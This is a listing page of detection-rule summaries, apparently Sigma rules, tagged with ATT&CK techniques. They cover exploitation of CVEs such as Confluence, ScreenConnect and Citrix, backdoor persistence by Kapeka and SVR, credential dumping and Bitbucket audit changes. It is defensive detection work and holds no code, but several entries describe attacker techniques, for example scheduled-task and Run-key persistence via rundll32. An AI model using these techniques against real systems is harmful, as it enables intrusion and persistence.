Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands

Read More
Suspicious Network Connection to IP Lookup Service APIs

Feb 3, 2025 · attack.discovery attack.t1016 ·
Share on:

Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post compromise internet test activity.

Read More
Suspicious Response File Execution Via Odbcconf.EXE

Feb 3, 2025 · attack.defense-evasion attack.t1218.008 ·
Share on:

Detects execution of "odbcconf" with the "-f" flag in order to load a response file with a non-".rsp" extension.

Read More
Sysmon Driver Altitude Change

Feb 3, 2025 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects changes in Sysmon driver altitude value. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.

Read More
Windows Defender Service Disabled - Registry

Feb 3, 2025 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry

Read More
WCE wceaux.dll Access

Jan 31, 2025 · attack.credential-access attack.t1003 attack.s0005 ·
Share on:

Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host

Read More
CVE-2023-1389 Potential Exploitation Attempt - Unauthenticated Command Injection In TP-Link Archer AX21

Jan 30, 2025 · attack.initial-access attack.t1190 cve.2023-1389 detection.emerging-threats ·
Share on:

Detects potential exploitation attempt of CVE-2023-1389 an Unauthenticated Command Injection in TP-Link Archer AX21.

Read More
CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux)

Jan 30, 2025 · attack.execution attack.t1059 attack.initial-access attack.t1190 cve.2023-22518 detection.emerging-threats ·
Share on:

Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.

Read More
CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows)

Jan 30, 2025 · attack.execution attack.t1059 attack.initial-access attack.t1190 cve.2023-22518 detection.emerging-threats ·
Share on:

Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.

Read More
CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Proxy)

Jan 30, 2025 · attack.initial-access attack.t1190 cve.2023-22518 detection.emerging-threats ·
Share on:

Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.

Read More
CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Webserver)

Jan 30, 2025 · attack.initial-access attack.t1190 cve.2023-22518 detection.emerging-threats ·
Share on:

Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.

Read More
CVE-2023-46747 Exploitation Activity - Proxy

Jan 30, 2025 · attack.initial-access attack.t1190 cve.2023-46747 detection.emerging-threats ·
Share on:

Detects exploitation activity of CVE-2023-46747 an unauthenticated remote code execution vulnerability in F5 BIG-IP.

Read More
CVE-2023-46747 Exploitation Activity - Webserver

Jan 30, 2025 · attack.initial-access attack.t1190 cve.2023-46747 detection.emerging-threats ·
Share on:

Detects exploitation activity of CVE-2023-46747 an unauthenticated remote code execution vulnerability in F5 BIG-IP.

Read More
CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy

Jan 30, 2025 · attack.initial-access attack.t1190 cve.2023-4966 detection.emerging-threats ·
Share on:

Detects exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via proxy logs by looking for a very long host header string.

Read More
CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver

Jan 30, 2025 · attack.initial-access attack.t1190 cve.2023-4966 detection.emerging-threats ·
Share on:

Detects exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via webserver logs by looking for a very long host header string.

Read More
CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy

Jan 30, 2025 · attack.initial-access attack.t1190 cve.2023-4966 detection.emerging-threats ·
Share on:

Detects potential exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via proxy logs.

Read More
CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver

Jan 30, 2025 · attack.initial-access attack.t1190 cve.2023-4966 detection.emerging-threats ·
Share on:

Detects potential exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via webserver logs.

Read More
CVE-2024-1708 - ScreenConnect Path Traversal Exploitation

Jan 30, 2025 · attack.persistence cve.2024-1708 detection.emerging-threats ·
Share on:

This detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708.

Read More
CVE-2024-1708 - ScreenConnect Path Traversal Exploitation - Security

Jan 30, 2025 · attack.initial-access attack.persistence cve.2024-1708 detection.emerging-threats ·
Share on:

This detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708. This requires an Advanced Auditing policy to log a successful Windows Event ID 4663 events and with a SACL set on the directory.

Read More
CVE-2024-1709 - ScreenConnect Authentication Bypass Exploitation

Jan 30, 2025 · attack.initial-access attack.persistence cve.2024-1709 detection.emerging-threats ·
Share on:

Detects GET requests to '/SetupWizard.aspx/[anythinghere]' that indicate exploitation of the ScreenConnect vulnerability CVE-2024-1709.

Read More
CVE-2024-50623 Exploitation Attempt - Cleo

Jan 30, 2025 · attack.execution attack.t1190 cve.2024-50623 detection.emerging-threats ·
Share on:

Detects exploitation attempt of Cleo's CVE-2024-50623 by looking for a "cmd.exe" process spawning from the Celo software suite with suspicious Powershell commandline.

Read More
DarkGate - Drop DarkGate Loader In C:\Temp Directory

Jan 30, 2025 · attack.execution attack.t1059 detection.emerging-threats ·
Share on:

Detects attackers attempting to save, decrypt and execute the DarkGate Loader in C:\temp folder.

Read More
DLL Names Used By SVR For GraphicalProton Backdoor

Jan 30, 2025 · attack.defense-evasion attack.t1574.002 detection.emerging-threats ·
Share on:

Hunts known SVR-specific DLL names.

Read More
Exploitation Attempt Of CVE-2023-46214 Using Public POC Code

Jan 30, 2025 · attack.lateral-movement attack.t1210 cve.2023-46214 detection.emerging-threats ·
Share on:

Detects exploitation attempt of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing using known public proof of concept code

Read More
File Creation Related To RAT Clients

Jan 30, 2025 · attack.execution detection.emerging-threats ·
Share on:

File .conf created related to VenomRAT, AsyncRAT and Lummac samples observed in the wild.

Read More
Forest Blizzard APT - File Creation Activity

Jan 30, 2025 · attack.defense-evasion attack.t1562.002 detection.emerging-threats ·
Share on:

Detects the creation of specific files inside of ProgramData directory. These files were seen being created by Forest Blizzard as described by MSFT.

Read More
Forest Blizzard APT - Process Creation Activity

Jan 30, 2025 · attack.defense-evasion attack.execution detection.emerging-threats ·
Share on:

Detects the execution of specific processes and command line combination. These were seen being created by Forest Blizzard as described by MSFT.

Read More
Kapeka Backdoor Autorun Persistence

Jan 30, 2025 · attack.persistence attack.t1547.001 detection.emerging-threats ·
Share on:

Detects the setting of a new value in the Autorun key that is used by the Kapeka backdoor for persistence.

Read More
Kapeka Backdoor Configuration Persistence

Jan 30, 2025 · attack.persistence attack.defense-evasion attack.t1553.003 detection.emerging-threats ·
Share on:

Detects registry set activity of a value called "Seed" stored in the "\Cryptography\Providers" registry key. The Kapeka backdoor leverages this location to register a new SIP provider for backdoor configuration persistence.

Read More
Kapeka Backdoor Execution Via RunDLL32.EXE

Jan 30, 2025 · attack.defense-evasion attack.t1218.011 detection.emerging-threats ·
Share on:

Detects Kapeka backdoor process execution pattern, where the dropper launch the backdoor binary by calling rundll32 and passing the backdoor's first export ordinal (#1) with a "-d" argument.

Read More
Kapeka Backdoor Loaded Via Rundll32.EXE

Jan 30, 2025 · attack.execution attack.t1204.002 attack.defense-evasion attack.t1218.011 detection.emerging-threats ·
Share on:

Detects the Kapeka Backdoor binary being loaded by rundll32.exe. The Kapeka loader drops a backdoor, which is a DLL with the '.wll' extension masquerading as a Microsoft Word Add-In.

Read More
Kapeka Backdoor Persistence Activity

Jan 30, 2025 · attack.persistence attack.t1053.005 detection.emerging-threats ·
Share on:

Detects Kapeka backdoor persistence activity. Depending on the process privileges, the Kapeka dropper then sets persistence for the backdoor either as a scheduled task (if admin or SYSTEM) or autorun registry (if not). For the scheduled task, it creates a scheduled task called "Sens Api" via schtasks command, which is set to run upon system startup as SYSTEM. To establish persistence through the autorun utility, it adds an autorun entry called "Sens Api" under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run via the "reg add" command. Both persistence mechanisms are set to launch the binary by calling rundll32 and passing the backdoor's first export ordinal (#1) without any additional argument.

Read More
Kapeka Backdoor Scheduled Task Creation

Jan 30, 2025 · attack.execution attack.privilege-escalation attack.persistence attack.t1053.005 detection.emerging-threats ·
Share on:

Detects Kapeka backdoor scheduled task creation based on attributes such as paths, commands line flags, etc.

Read More
Lummac Stealer Activity - Execution Of More.com And Vbc.exe

Jan 30, 2025 · attack.defense-evasion attack.t1055 detection.emerging-threats ·
Share on:

Detects the execution of more.com and vbc.exe in the process tree. This behavior was observed by a set of samples related to Lummac Stealer. The Lummac payload is injected into the vbc.exe process.

Read More
MOVEit CVE-2023-34362 Exploitation Attempt - Potential Web Shell Request

Jan 30, 2025 · attack.persistence attack.t1505.003 cve.2023-34362 detection.emerging-threats ·
Share on:

Detects get requests to specific files used during the exploitation of MOVEit CVE-2023-34362

Read More
OWASSRF Exploitation Attempt Using Public POC - Proxy

Jan 30, 2025 · attack.initial-access attack.t1190 detection.emerging-threats ·
Share on:

Detects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint

Read More
Pikabot Fake DLL Extension Execution Via Rundll32.EXE

Jan 30, 2025 · attack.defense-evasion attack.execution detection.emerging-threats ·
Share on:

Detects specific process tree behavior linked to "rundll32" executions, wherein the associated DLL lacks a common ".dll" extension, often signaling potential Pikabot activity.

Read More
Potential BlackByte Ransomware Activity

Jan 30, 2025 · attack.execution attack.defense-evasion attack.impact attack.t1485 attack.t1498 attack.t1059.001 attack.t1140 detection.emerging-threats ·
Share on:

Detects command line patterns used by BlackByte ransomware in different operations

Read More
Potential CSharp Streamer RAT Loading .NET Executable Image

Jan 30, 2025 · attack.command-and-control attack.t1219 detection.emerging-threats ·
Share on:

Detects potential CSharp Streamer RAT loading .NET executable image by using the default file name and path associated with the tool.

Read More
Potential CVE-2023-27997 Exploitation Indicators

Jan 30, 2025 · attack.initial-access attack.t1190 cve.2023-27997 detection.emerging-threats ·
Share on:

Detects indicators of potential exploitation of CVE-2023-27997 in Frotigate weblogs. To avoid false positives it is best to look for successive requests to the endpoints mentioned as well as weird values of the "enc" parameter

Read More
Potential Exploitation Attempt Of Undocumented WindowsServer RCE

Jan 30, 2025 · attack.initial-access attack.t1190 detection.emerging-threats ·
Share on:

Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)

Read More
Potential Exploitation of CVE-2024-3094 - Suspicious SSH Child Process

Jan 30, 2025 · attack.execution cve.2024-3094 detection.emerging-threats ·
Share on:

Detects potentially suspicious child process of SSH process (sshd) with a specific execution user. This could be a sign of potential exploitation of CVE-2024-3094.

Read More
Potential Kapeka Decrypted Backdoor Indicator

Jan 30, 2025 · attack.defense-evasion detection.emerging-threats ·
Share on:

Detects the presence of a file that is decrypted backdoor binary dropped by the Kapeka Dropper, which disguises itself as a hidden file under a folder named "Microsoft" within "CSIDL_COMMON_APPDATA" or "CSIDL_LOCAL_APPDATA", depending on the process privileges. The file, typically 5-6 characters long with a random combination of consonants and vowels followed by a ".wll" extension to pose as a legitimate file to evade detection.

Read More
Potential OWASSRF Exploitation Attempt - Proxy

Jan 30, 2025 · attack.initial-access attack.t1190 detection.emerging-threats ·
Share on:

Detects exploitation attempt of the OWASSRF variant targeting exchange servers It uses the OWA endpoint to access the powershell backend endpoint

Read More
Potential Raspberry Robin Aclui Dll SideLoading

Jan 30, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001 attack.t1574.002 detection.emerging-threats ·
Share on:

Detects potential sideloading of malicious "aclui.dll" by OleView.This behavior was observed in Raspberry-Robin variants reported by chekpoint research on Feburary 2024.

Read More
Potential Raspberry Robin CPL Execution Activity

Jan 30, 2025 · attack.defense-evasion attack.execution attack.t1218.011 detection.emerging-threats ·
Share on:

Detects the execution of a ".CPL" file located in the user temp directory via the Shell32 DLL "Control_RunDLL" export function. This behavior was observed in multiple Raspberry-Robin variants.

Read More
Potential Raspberry Robin Registry Set Internet Settings ZoneMap

Jan 30, 2025 · attack.t1112 attack.defense-evasion detection.emerging-threats ·
Share on:

Detects registry modifications related to the proxy configuration of the system, potentially associated with the Raspberry Robin malware, as seen in campaigns running in Q1 2024. Raspberry Robin may alter proxy settings to circumvent security measures, ensuring unhindered connection with Command and Control servers for maintaining control over compromised systems if there are any proxy settings that are blocking connections.

Read More
Qakbot Uninstaller Execution

Jan 30, 2025 · attack.execution detection.emerging-threats ·
Share on:

Detects the execution of the Qakbot uninstaller file mentioned in the USAO-CDCA document on the disruption of the Qakbot malware and botnet

Read More
Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor

Jan 30, 2025 · attack.persistence detection.emerging-threats ·
Share on:

Hunts for known SVR-specific scheduled task names

Read More
Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor - Task Scheduler

Jan 30, 2025 · attack.persistence detection.emerging-threats ·
Share on:

Hunts for known SVR-specific scheduled task names

Read More
ScreenConnect - SlashAndGrab Exploitation Indicators

Jan 30, 2025 · attack.defense-evasion detection.emerging-threats ·
Share on:

Detects indicators of exploitation by threat actors during exploitation of the "SlashAndGrab" vulnerability related to ScreenConnect as reported Team Huntress

Read More
ScreenConnect User Database Modification

Jan 30, 2025 · attack.persistence cve.2024-1709 detection.emerging-threats ·
Share on:

Detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server. This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions.

Read More
ScreenConnect User Database Modification - Security

Jan 30, 2025 · attack.defense-evasion cve.2024-1709 detection.emerging-threats ·
Share on:

This detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server. This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions. This requires an Advanced Auditing policy to log a successful Windows Event ID 4663 events and with a SACL set on the directory.

Read More
Suspicious Computer Account Name Change CVE-2021-42287

Jan 30, 2025 · attack.defense-evasion attack.persistence attack.t1036 attack.t1098 cve.2021-42287 detection.emerging-threats ·
Share on:

Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287

Read More
Suspicious Set Value of MSDT in Registry (CVE-2022-30190)

Jan 30, 2025 · attack.defense-evasion attack.t1221 detection.emerging-threats ·
Share on:

Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.

Read More
Failed Code Integrity Checks

Jan 30, 2025 · attack.defense-evasion attack.t1027.001 ·
Share on:

Detects code integrity failures such as missing page hashes or corrupted drivers due unauthorized modification. This could be a sign of tampered binaries.

Read More
Renamed Powershell Under Powershell Channel

Jan 30, 2025 · attack.execution attack.t1059.001 attack.t1036.003 ·
Share on:

Detects a renamed Powershell execution, which is a common technique used to circumvent security controls and bypass detection logic that's dependent on process names and process paths.

Read More
Suspicious Binaries and Scripts in Public Folder

Jan 30, 2025 · attack.execution attack.t1204 ·
Share on:

Detects the creation of a file with a suspicious extension in the public folder, which could indicate potential malicious activity.

Read More
Using explorer.exe to open a file explorer folder via command prompt

Jan 29, 2025 · attack.Discovery attack.T1135 ·
Share on:

Detects the initial execution of cmd.exe which spawns explorer.exe with the appropriate command line arguments for opening the My Computer folder.

Read More
Privileged User Has Been Created

Jan 22, 2025 · attack.persistence attack.t1136.001 attack.t1098 ·
Share on:

Detects the addition of a new user to a privileged group such as "root" or "sudo"

Read More
HackTool - Dumpert Process Dumper Execution

Jan 22, 2025 · attack.credential-access attack.t1003.001 ·
Share on:

Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory

Read More
ManageEngine Endpoint Central Dctask64.EXE Potential Abuse

Jan 22, 2025 · attack.defense-evasion attack.t1055.001 ·
Share on:

Detects the execution of "dctask64.exe", a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central. This binary can be abused for DLL injection, arbitrary command and process execution.

Read More
Renamed ZOHO Dctask64 Execution

Jan 22, 2025 · attack.defense-evasion attack.t1036 attack.t1055.001 attack.t1202 attack.t1218 ·
Share on:

Detects a renamed "dctask64.exe" execution, a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central. This binary can be abused for DLL injection, arbitrary command and process execution.

Read More
Potentially Suspicious Volume Shadow Copy Vsstrace.dll Load

Jan 19, 2025 · attack.defense-evasion attack.impact attack.t1490 ·
Share on:

Detects the image load of VSS DLL by uncommon executables

Read More
Azure Login Bypassing Conditional Access Policies

Jan 19, 2025 · attack.defense-evasion attack.t1078 ·
Share on:

Detects a successful login to the Microsoft Intune Company Portal which could allow bypassing Conditional Access Policies and InTune device trust using a tool like TokenSmith.

Read More
Shell Execution via Rsync - Linux

Jan 19, 2025 · attack.execution attack.t1059 ·
Share on:

Detects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.

Read More
Suspicious Invocation of Shell via Rsync

Jan 19, 2025 · attack.execution attack.t1059 attack.t1203 ·
Share on:

Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.

Read More
Exploit Framework User Agent

Jan 19, 2025 · attack.command-and-control attack.t1071.001 ·
Share on:

Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs

Read More
Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe Creation

Jan 15, 2025 · attack.execution cve.2023-36874 detection.emerging-threats ·
Share on:

Detects the creation of a file named "wermgr.exe" being created in an uncommon directory. This could be a sign of potential exploitation of CVE-2023-36874.

Read More
CVE-2024-49113 Exploitation Attempt - LDAP Nightmare

Jan 8, 2025 · attack.impact attack.t1499 cve.2024-49113 detection.emerging-threats ·
Share on:

Detects exploitation attempt of CVE-2024-49113 known as LDAP Nightmare, based on "Application Error" log where the faulting application is "lsass.exe" and the faulting module is "WLDAP32.dll".

Read More
Active Directory Certificate Services Denied Certificate Enrollment Request

Jan 6, 2025 · attack.credential-access attack.t1553.004 ·
Share on:

Detects denied requests by Active Directory Certificate Services. Example of these requests denial include issues with permissions on the certificate template or invalid signatures.

Read More
AWS Console GetSigninToken Potential Abuse

Jan 6, 2025 · attack.lateral-movement attack.t1021.007 attack.t1550.001 ·
Share on:

Detects potentially suspicious events involving "GetSigninToken". An adversary using the "aws_consoler" tool can leverage this console API to create temporary federated credential that help obfuscate which AWS credential is compromised (the original access key) and enables the adversary to pivot from the AWS CLI to console sessions without the need for MFA using the new access key issued in this request.

Read More
Bitbucket Audit Log Configuration Updated

Jan 6, 2025 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects changes to the bitbucket audit log configuration.

Read More
Bitbucket Full Data Export Triggered

Jan 6, 2025 · attack.collection attack.t1213.003 ·
Share on:

Detects when full data export is attempted.

Read More
Bitbucket Global Permission Changed

Jan 6, 2025 · attack.persistence attack.privilege-escalation attack.t1098 ·
Share on:

Detects global permissions change activity.

Read More
Bitbucket Global Secret Scanning Rule Deleted

Jan 6, 2025 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects Bitbucket global secret scanning rule deletion activity.

Read More
Bitbucket Global SSH Settings Changed

Jan 6, 2025 · attack.lateral-movement attack.defense-evasion attack.t1562.001 attack.t1021.004 ·
Share on:

Detects Bitbucket global SSH access configuration changes.

Read More
Bitbucket Project Secret Scanning Allowlist Added

Jan 6, 2025 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects when a secret scanning allowlist rule is added for projects.

Read More
Bitbucket Secret Scanning Exempt Repository Added

Jan 6, 2025 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects when a repository is exempted from secret scanning feature.

Read More
Bitbucket Secret Scanning Rule Deleted

Jan 6, 2025 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects when secret scanning rule is deleted for the project or repository.

Read More
Bitbucket Unauthorized Access To A Resource

Jan 6, 2025 · attack.resource-development attack.t1586 ·
Share on:

Detects unauthorized access attempts to a resource.

Read More
Bitbucket Unauthorized Full Data Export Triggered

Jan 6, 2025 · attack.collection attack.resource-development attack.t1213.003 attack.t1586 ·
Share on:

Detects when full data export is attempted an unauthorized user.

Read More
Bitbucket User Details Export Attempt Detected

Jan 6, 2025 · attack.collection attack.reconnaissance attack.discovery attack.t1213 attack.t1082 attack.t1591.004 ·
Share on:

Detects user data export activity.

Read More
Bitbucket User Login Failure

Jan 6, 2025 · attack.defense-evasion attack.credential-access attack.t1078.004 attack.t1110 ·
Share on:

Detects user authentication failure events. Please note that this rule can be noisy and it is recommended to use with correlation based on "author.name" field.

Read More
Bitbucket User Login Failure Via SSH

Jan 6, 2025 · attack.t1021.004 attack.t1110 ·
Share on:

Detects SSH user login access failures. Please note that this rule can be noisy and is recommended to use with correlation based on "author.name" field.

Read More
Bitbucket User Permissions Export Attempt

Jan 6, 2025 · attack.reconnaissance attack.t1213 attack.t1082 attack.t1591.004 ·
Share on:

Detects user permission data export attempt.

Read More
Console CodePage Lookup Via CHCP

Jan 6, 2025 · attack.discovery attack.t1614.001 ·
Share on:

Detects use of chcp to look up the system locale value as part of host discovery

Read More
Diskshadow Script Mode - Uncommon Script Extension Execution

Jan 6, 2025 · attack.defense-evasion attack.t1218 ·
Share on:

Detects execution of "Diskshadow.exe" in script mode to execute an script with a potentially uncommon extension. Initial baselining of the allowed extension list is required.

Read More
DNS Query Request To OneLaunch Update Service

Jan 6, 2025 · attack.collection attack.t1056 ·
Share on:

Detects DNS query requests to "update.onelaunch.com". This domain is associated with the OneLaunch adware application. When the OneLaunch application is installed it will attempt to get updates from this domain.

Read More
DPRK Threat Actor - C2 Communication DNS Indicators

Jan 6, 2025 · attack.command-and-control detection.emerging-threats ·
Share on:

Detects DNS queries for C2 domains used by DPRK Threat actors.

Read More
Enumerate All Information With Whoami.EXE

Jan 6, 2025 · attack.discovery attack.t1033 car.2016-03-001 ·
Share on:

Detects the execution of "whoami.exe" with the "/all" flag

Read More
Exploitation Indicator Of CVE-2022-42475

Jan 6, 2025 · attack.initial-access cve.2022-42475 detection.emerging-threats ·
Share on:

Detects exploitation indicators of CVE-2022-42475 a heap-based buffer overflow in sslvpnd.

Read More
File In Suspicious Location Encoded To Base64 Via Certutil.EXE

Jan 6, 2025 · attack.defense-evasion attack.t1027 ·
Share on:

Detects the execution of certutil with the "encode" flag to encode a file to base64 where the files are located in potentially suspicious locations

Read More
Github Push Protection Bypass Detected

Jan 6, 2025 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects when a user bypasses the push protection on a secret detected by secret scanning.

Read More
Github Push Protection Disabled

Jan 6, 2025 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects if the push protection feature is disabled for an organization, enterprise, repositories or custom pattern rules.

Read More
HackTool - Evil-WinRm Execution - PowerShell Module

Jan 6, 2025 · attack.lateral-movement ·
Share on:

Detects the execution of Evil-WinRM via PowerShell Module logs by leveraging the hardcoded strings inside the utility.

Read More
Insensitive Subfolder Search Via Findstr.EXE

Jan 6, 2025 · attack.defense-evasion attack.t1218 attack.t1564.004 attack.t1552.001 attack.t1105 ·
Share on:

Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.

Read More
Interesting Service Enumeration Via Sc.EXE

Jan 6, 2025 · attack.t1003 ·
Share on:

Detects the enumeration and query of interesting and in some cases sensitive services on the system via "sc.exe". Attackers often try to enumerate the services currently running on a system in order to find different attack vectors.

Read More
No Suitable Encryption Key Found For Generating Kerberos Ticket

Jan 6, 2025 · attack.credential-access attack.t1558.003 ·
Share on:

Detects errors when a target server doesn't have suitable keys for generating kerberos tickets. This issue can occur for example when a service uses a user account or a computer account that is configured for only DES encryption on a computer that is running Windows 7 which has DES encryption for Kerberos authentication disabled.

Read More
Port Forwarding Activity Via SSH.EXE

Jan 6, 2025 · attack.command-and-control attack.lateral-movement attack.t1572 attack.t1021.001 attack.t1021.004 ·
Share on:

Detects port forwarding activity via SSH.exe

Read More
Potential Credential Dumping Activity Via LSASS

Jan 6, 2025 · attack.credential-access attack.t1003.001 attack.s0002 ·
Share on:

Detects process access requests to the LSASS process with specific call trace calls and access masks. This behaviour is expressed by many credential dumping tools such as Mimikatz, NanoDump, Invoke-Mimikatz, Procdump and even the Taskmgr dumping feature.

Read More
Potential SentinelOne Shell Context Menu Scan Command Tampering

Jan 6, 2025 · attack.persistence ·
Share on:

Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne.

Read More
Potentially Suspicious Ping/Copy Command Combination

Jan 6, 2025 · attack.defense-evasion attack.t1070.004 ·
Share on:

Detects uncommon and potentially suspicious one-liner command containing both "ping" and "copy" at the same time, which is usually used by malware.

Read More
Qakbot Regsvr32 Calc Pattern

Jan 6, 2025 · attack.defense-evasion attack.execution detection.emerging-threats ·
Share on:

Detects a specific command line of "regsvr32" where the "calc" keyword is used in conjunction with the "/s" flag. This behavior is often seen used by Qakbot

Read More
Rebuild Performance Counter Values Via Lodctr.EXE

Jan 6, 2025 · attack.execution ·
Share on:

Detects the execution of "lodctr.exe" to rebuild the performance counter registry values. This can be abused by attackers by providing a malicious config file to overwrite performance counter configuration to confuse and evade monitoring and security solutions.

Read More
Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate

Jan 6, 2025 · attack.execution attack.initial-access ·
Share on:

Detects the execution of an AnyDesk binary with a version prior to 8.0.8. Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors. Use this rule to detect instances of older versions of Anydesk using the compromised certificate This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections.

Read More
Remote Access Tool - ScreenConnect Remote Command Execution

Jan 6, 2025 · attack.execution attack.t1059.003 ·
Share on:

Detects the execution of a system command via the ScreenConnect RMM service.

Read More
Remote Access Tool - ScreenConnect Server Web Shell Execution

Jan 6, 2025 · attack.initial-access attack.t1190 ·
Share on:

Detects potential web shell execution from the ScreenConnect server process.

Read More
Remote Access Tool - Simple Help Execution

Jan 6, 2025 · attack.command-and-control attack.t1219 ·
Share on:

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Read More
Remote File Download Via Findstr.EXE

Jan 6, 2025 · attack.defense-evasion attack.t1218 attack.t1564.004 attack.t1552.001 attack.t1105 ·
Share on:

Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry.

Read More
Response File Execution Via Odbcconf.EXE

Jan 6, 2025 · attack.defense-evasion attack.t1218.008 ·
Share on:

Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action.

Read More
Suspicious File Download From IP Via Wget.EXE - Paths

Jan 6, 2025 · attack.execution ·
Share on:

Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe

Read More
Suspicious File Encoded To Base64 Via Certutil.EXE

Jan 6, 2025 · attack.defense-evasion attack.t1027 ·
Share on:

Detects the execution of certutil with the "encode" flag to encode a file to base64 where the extensions of the file is suspicious

Read More
Suspicious Invoke-WebRequest Execution

Jan 6, 2025 · attack.command-and-control attack.t1105 ·
Share on:

Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location

Read More
Unsigned DLL Loaded by Windows Utility

Jan 6, 2025 · attack.t1218.011 attack.t1218.010 attack.defense-evasion ·
Share on:

Detects windows utilities loading an unsigned or untrusted DLL. Adversaries often abuse those programs to proxy execution of malicious code.

Read More
Suspicious Non PowerShell WSMAN COM Provider

Dec 28, 2024 · attack.execution attack.t1059.001 attack.lateral-movement attack.t1021.003 ·
Share on:

Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.

Read More
BITS Transfer Job With Uncommon Or Suspicious Remote TLD

Dec 27, 2024 · attack.defense-evasion attack.persistence attack.t1197 ·
Share on:

Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.

Read More
CodeIntegrity - Unmet Signing Level Requirements By File Under Validation

Dec 27, 2024 · attack.execution ·
Share on:

Detects attempted file load events that did not meet the signing level requirements. It often means the file's signature is revoked or a signature with the Lifetime Signing EKU has expired. This event is best correlated with EID 3089 to determine the error of the validation.

Read More
Relevant Anti-Virus Signature Keywords In Application Log

Dec 27, 2024 · attack.resource-development attack.t1588 ·
Share on:

Detects potentially highly relevant antivirus events in the application log based on known virus signature names and malware keywords.

